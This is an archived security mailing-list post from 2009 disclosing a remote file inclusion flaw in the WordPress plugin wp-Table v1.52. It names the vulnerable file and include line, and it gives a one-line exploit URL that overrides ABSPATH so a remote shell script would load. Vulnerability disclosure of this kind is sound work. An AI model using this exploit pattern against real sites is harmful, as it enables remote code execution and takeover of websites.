[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

wordpress plugins wp-Table v1.52 Remote File Inclusion Vulnerability

To: vuldb <vuldb@xxxxxxxxxxxxxxxxx>, vuln <vuln@xxxxxxxxxxx>, "Vladimir '3APA3A' Dubrovin" <3APA3A@xxxxxxxxxxxxxxxx>, bugtraq@xxxxxxxxxxxxxxxxx, submit@xxxxxxxxxxx, secalert@xxxxxxxxxxxxxxxxxx, submissions@xxxxxxxxxxxxxxxxxxxxxxx
Subject: wordpress plugins wp-Table v1.52 Remote File Inclusion Vulnerability
From: "Cru3l.b0y" <cru3l.b0y@xxxxxxxxx>
Date: Thu, 30 Jul 2009 21:49:32 +0430

Hi Dear,
I found a new bug. please publish it.
thank you
best regards

===========================================================================================


  [o] wordpress plugins wp-Table v1.52 Remote File Inclusion Vulnerability

       Software     :  wp-Table v1.52
       Vendor       :  http://wordpress.org/
       Download     :  http://wordpress.org/extend/plugins/wp-table/wp-table.zip
       Author       :  Cru3l.b0y
       Home         :  WwW.DeltaHacking.Net
       Description  :  This plugin is a simple table manager for wordpress.
===========================================================================================

  [o] Vulnerable file

         js/wptable-tinymce.php

                require_once(ABSPATH.'/wp-admin/admin.php');
        
        
  [o] Exploit

            http://localhost/[path]/js/wptable-tinymce.php?ABSPATH=shell

Follow-Ups:
- Re: wordpress plugins wp-Table v1.52 Remote File Inclusion Vulnerability
  - From: Francesco Laurita

Prev by Date: Re: THISISNOTMYEXPLOIT
Next by Date: [SECURITY] [DSA 1834-2] New apache/apache2-mpm-itk fix regression
Previous by thread: EPSON Status Monitor 3 local privilege escalation vulnerability
Next by thread: Re: wordpress plugins wp-Table v1.52 Remote File Inclusion Vulnerability
Index(es):
- Date
- Thread